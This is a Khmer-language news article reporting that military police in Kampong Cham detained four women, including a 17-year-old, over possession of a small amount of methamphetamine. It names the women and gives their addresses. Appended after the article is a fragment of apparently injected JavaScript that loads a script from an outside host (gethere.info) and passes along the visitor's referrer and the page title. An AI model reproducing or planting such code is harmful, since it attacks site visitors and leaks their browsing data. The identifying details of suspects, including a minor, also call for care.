ស្ត្រី៤នាក់ ត្រូវអាវុធហត្ថក្រុងកំពង់ចាមឃាត់ខ្លួនសង្ស័យជាប់ពាក់ព័ន្ធជាមួយសារធាតុញៀន

កំពង់ចាម៖ នៅវេលាម៉ោង១១ និង០០នាទី ព្រឹកថ្ងៃទី២១ ខែសីហា ឆ្នាំ២០១៦ កម្លាំងមូលដ្ឋានកងរាជអាវុធហត្ថក្រុងកំពង់ចាមបានធ្វើការឃាត់ជនសង្ស័យចំនួន០៤នាក់ ជាប់ពាក់ព័ន្ធជាមួយករណីរក្សាទុក និងប្រើប្រាស់នូវសារធាតុញៀន ស្ថិតនៅចំណុច ភូមិបឹងកុកទី១ សង្កាត់បឹង កុក ក្រុងកំពង់ចាម ខេត្តកំពង់ចាម។

ប្រភពពីមន្ត្រីកងរាជអាវុធហត្ថខេត្តកំពង់ចាម បានឱ្យដឹងថា ជនសង្ស័យដែលត្រូវកម្លាំងកងរាជអាវុធហត្ថធ្វើការឃាត់ខ្លួន នោះរួមមានឈ្មោះ។
០១. លីម ស្រីមួយ ហៅណាំ ភេទស្រី អាយុ១៧ឆ្នាំ មុខរបរមិនពិតប្រាកដ ជនជាតិខ្មែរ រស់នៅភូមិទី៥ សង្កាត់វាលវង់ ក្រុងកំពង់ចាម ខេត្តកំពង់ចាម។
០២. ហ៊ិន ស្រីល័ក្ខ ភេទស្រី អាយុ២៧ឆ្នាំ រស់នៅភូមិឡឥត សង្កាត់បឹងកុក ក្រុងកំពង់ចាម ខេត្តកំពង់ចាម។
០៣. យ៉ង សុខស្រីមាន ហៅមុំ ភេទស្រី អាយុ២៣ឆ្នាំ រស់នៅភូមិបាគូរ ឃុំបាគូរ ស្រុកកណ្តាលស្ទឹង ខេត្តកណ្តាល
០៤. ផន កន្នីការ ហៅការ ភេទស្រី អាយុ២៧ឆ្នាំ រស់នៅភូមិចុងថ្នល់ សង្កាត់បឹងកុក ក្រុងកំពង់ចាម ខេត្តកំពង់ចាម។
វត្ថុតាងរឹបអូសបានរួមមាន៖
០១. ថ្នាំញៀនប្រភេទម៉ាទឹកកកចំនួន ០២កញ្ចប់ ដែលមានទម្ងន់ស្មើ ០.៤៧ក្រាម
០២. ទូរស័ព្ទចំនួន០៣គ្រឿង។

ជនសង្ស័យ និងវត្ថុតាង ត្រូវបានបញ្ជូនទៅការិយាល័យប្រឆាំងបទល្មើសគ្រឿងញៀន កងរាជអាវុធហត្ថខេត្តកំពង់ចាម ដើម្បីសាកសួរ និងកសាងសំណុំរឿង ចាត់ការបន្តតាមនីតិវិធី៕s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More